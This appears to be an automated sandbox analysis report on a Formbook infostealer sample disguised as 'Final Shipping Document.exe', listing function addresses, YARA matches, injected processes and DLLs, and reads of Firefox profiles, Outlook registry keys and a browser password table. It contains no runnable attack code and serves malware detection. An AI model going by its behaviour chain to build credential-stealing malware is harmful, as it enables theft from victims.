    0_2_00C12046, 0_2_00BA8060, 0_2_00C08298, 0_2_00BDE4FF, 0_2_00BD676B, 0_2_00C34873, 0_2_00BCCAA0, 0_2_00BACAF0,
    0_2_00BBCC39, 0_2_00BD6DD9, 0_2_00BA91C0, 0_2_00BBB119, 0_2_00BC1394, 0_2_00BC1706, 0_2_00BC781B, 0_2_00BC19B0,
    0_2_00BA7920, 0_2_00BB997D, 0_2_00BC7A4A, 0_2_00BC7CA7, 0_2_00BC1C77, 0_2_00BD9EEE, 0_2_00C2BE44, 0_2_00BC1F32,
    0_2_01573610
Source: C:\Windows\SysWOW64\svchost.exe | Code functions:
    2_2_00410033, 2_2_0040E0B3, 2_2_004031D0, 2_2_004011F0, 2_2_00416AFC, 2_2_00416B43, 2_2_00416B3E, 2_2_004024A0,
    2_2_0042E673, 2_2_0040FE0B, 2_2_0040FE13, 2_2_033FA352, 2_2_034003E6, 2_2_0334E3F0, 2_2_033E0274, 2_2_033C02C0,
    2_2_033DA118, 2_2_03330100, 2_2_033C8158, 2_2_033F41A2, 2_2_034001AA, 2_2_033F81CC, 2_2_033D2000, 2_2_03340770,
    2_2_03364750, 2_2_0333C7C0, 2_2_0335C6E0, 2_2_03340535, 2_2_03400591, 2_2_033E4420, 2_2_033F2446, 2_2_033EE4F6,
    2_2_033FAB40, 2_2_033F6BD7, 2_2_0333EA80, 2_2_03356962, 2_2_033429A0, 2_2_0340A9A6, 2_2_0334A840, 2_2_03342840,
    2_2_033268B8, 2_2_0336E8F0, 2_2_03360F30, 2_2_033E2F30, 2_2_03382F28, 2_2_033B4F40, 2_2_033BEFA0, 2_2_0334CFE0,
    2_2_03332FC8, 2_2_033FEE26, 2_2_03340E59, 2_2_03352E90, 2_2_033FCE93, 2_2_033FEEDB, 2_2_033DCD1F, 2_2_0334AD00,
    2_2_03358DBF, 2_2_0333ADE0, 2_2_03340C00, 2_2_033E0CB5, 2_2_03330CF2, 2_2_033F132D, 2_2_0332D34C, 2_2_0338739A,
    2_2_033452A0, 2_2_033E12ED, 2_2_0335B2C0, 2_2_0340B16B, 2_2_0332F172, 2_2_0337516C, 2_2_0334B1B0, 2_2_033F70E9,
    2_2_033FF0E0, 2_2_033EF0CC, 2_2_033470C0, 2_2_033FF7B0, 2_2_03385630, 2_2_033F16CC, 2_2_033F7571, 2_2_034095C3,
    2_2_033DD5B0, 2_2_033FF43F, 2_2_03331460, 2_2_033FFB76, 2_2_0335FB80, 2_2_033B5BF0, 2_2_0337DBF9, 2_2_033B3A6C,
    2_2_033FFA49, 2_2_033F7A46, 2_2_033DDAAC, 2_2_03385AA0, 2_2_033E1AA3, 2_2_033EDAC6, 2_2_033D5910, 2_2_03349950,
    2_2_0335B950, 2_2_033AD800, 2_2_033438E0, 2_2_033FFF09, 2_2_033FFFB1, 2_2_03341F92, 2_2_03303FD2, 2_2_03303FD5,
    2_2_03349EB0, 2_2_033F7D73, 2_2_033F1D5A, 2_2_03343D40, 2_2_0335FDC0, 2_2_033B9C32, 2_2_033FFCF2
Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Code functions:
    4_2_034AA38F, 4_2_034AA16F, 4_2_034AA167, 4_2_034C89CF, 4_2_034B0E58, 4_2_034B0E9A, 4_2_034B0E9F, 4_2_034A840F
Source: C:\Windows\SysWOW64\gpupdate.exe | Code functions:
    5_2_04F7E4F6, 5_2_04F82446, 5_2_04F74420, 5_2_04F90591, 5_2_04ED0535, 5_2_04EEC6E0, 5_2_04ECC7C0, 5_2_04ED0770,
    5_2_04EF4750, 5_2_04F62000, 5_2_04F881CC, 5_2_04F901AA, 5_2_04F841A2, 5_2_04F58158, 5_2_04EC0100, 5_2_04F6A118,
    5_2_04F502C0, 5_2_04F70274, 5_2_04EDE3F0, 5_2_04F903E6, 5_2_04F8A352, 5_2_04EC0CF2, 5_2_04F70CB5, 5_2_04ED0C00,
    5_2_04ECADE0, 5_2_04EE8DBF, 5_2_04F6CD1F, 5_2_04EDAD00, 5_2_04F8EEDB, 5_2_04F8CE93, 5_2_04EE2E90, 5_2_04ED0E59,
    5_2_04F8EE26, 5_2_04EDCFE0, 5_2_04EC2FC8, 5_2_04F4EFA0, 5_2_04F44F40, 5_2_04F72F30, 5_2_04F12F28, 5_2_04EF0F30,
    5_2_04EFE8F0, 5_2_04EB68B8, 5_2_04ED2840, 5_2_04EDA840, 5_2_04ED29A0, 5_2_04F9A9A6, 5_2_04EE6962, 5_2_04ECEA80,
    5_2_04F86BD7, 5_2_04F8AB40, 5_2_04EC1460, 5_2_04F8F43F, 5_2_04F995C3, 5_2_04F6D5B0, 5_2_04F87571, 5_2_04F816CC,
    5_2_04F15630, 5_2_04F8F7B0, 5_2_04F870E9, 5_2_04F8F0E0, 5_2_04ED70C0, 5_2_04F7F0CC, 5_2_04EDB1B0, 5_2_04F9B16B,
    5_2_04EBF172, 5_2_04F0516C, 5_2_04F712ED, 5_2_04EEB2C0, 5_2_04ED52A0, 5_2_04F1739A, 5_2_04EBD34C, 5_2_04F8132D,
    5_2_04F8FCF2, 5_2_04F49C32, 5_2_04EEFDC0, 5_2_04F87D73, 5_2_04F81D5A, 5_2_04ED3D40, 5_2_04ED9EB0, 5_2_04F8FFB1,
    5_2_04ED1F92, 5_2_04F8FF09, 5_2_04ED38E0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F3D8005_2_04F3D800
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04ED99505_2_04ED9950
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EEB9505_2_04EEB950
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F659105_2_04F65910
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F7DAC65_2_04F7DAC6
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F15AA05_2_04F15AA0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F71AA35_2_04F71AA3
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F6DAAC5_2_04F6DAAC
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F43A6C5_2_04F43A6C
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8FA495_2_04F8FA49
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F87A465_2_04F87A46
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F45BF05_2_04F45BF0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F0DBF95_2_04F0DBF9
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04EEFB805_2_04EEFB80
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F8FB765_2_04F8FB76
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D91A605_2_02D91A60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8CBE05_2_02D8CBE0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8C9C05_2_02D8C9C0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8C9B85_2_02D8C9B8
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D8AC605_2_02D8AC60
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02DAB2205_2_02DAB220
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D936F05_2_02D936F0
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D936EB5_2_02D936EB
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D936A95_2_02D936A9
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6E4355_2_04D6E435
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6E7D45_2_04D6E7D4
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6E3155_2_04D6E315
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6D8385_2_04D6D838
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0332B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03387E54 appears 111 times
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: String function: 00BC0A30 appears 46 times
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: String function: 00BA9CB3 appears 31 times
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: String function: 00BBF9F2 appears 40 times
            Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: String function: 04F17E54 appears 111 times
            Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: String function: 04EBB970 appears 280 times
            Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: String function: 04F4F290 appears 105 times
            Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: String function: 04F05130 appears 58 times
            Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: String function: 04F3EA12 appears 86 times
            Source: Final Shipping Document.exe, 00000000.00000003.2036830324.000000000418D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Final Shipping Document.exe
            Source: Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003FE3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Final Shipping Document.exe
            Source: Final Shipping Document.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@13/8
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C137B5 GetLastError,FormatMessageW,0_2_00C137B5
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C010BF AdjustTokenPrivileges,CloseHandle,0_2_00C010BF
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C016C3
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C151CD
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C2A67C
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C1648E
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00BA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00BA42A2
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | File created: C:\Users\user\AppData\Local\Temp\autEBF.tmp
            Source: Final Shipping Document.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: gpupdate.exe, 00000005.00000003.2656659944.00000000031CE000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3888691030.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3888691030.00000000031C6000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2645909061.00000000031C6000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2645709837.00000000031A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Final Shipping Document.exe | ReversingLabs: Detection: 63%
            Source: unknown | Process created: C:\Users\user\Desktop\Final Shipping Document.exe "C:\Users\user\Desktop\Final Shipping Document.exe"
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Final Shipping Document.exe"
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"
            Source: C:\Windows\SysWOW64\gpupdate.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: wevtapi.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\gpupdate.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\gpupdate.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Final Shipping Document.exe | Static file information: File size 1225216 > 1048576
            Source: Final Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Final Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Final Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Final Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Final Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Final Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Final Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: gpupdate.pdb source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gpupdate.pdbGCTL source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QnAcfZuONg.exe, 00000004.00000002.3888447238.00000000001AE000.00000002.00000001.01000000.00000005.sdmp, QnAcfZuONg.exe, 00000007.00000002.3888452775.00000000001AE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
            Source: Final Shipping Document.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Final Shipping Document.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Final Shipping Document.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Final Shipping Document.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Final Shipping Document.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BA42DE
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00BC0A76 push ecx; ret 0_2_00BC0A89
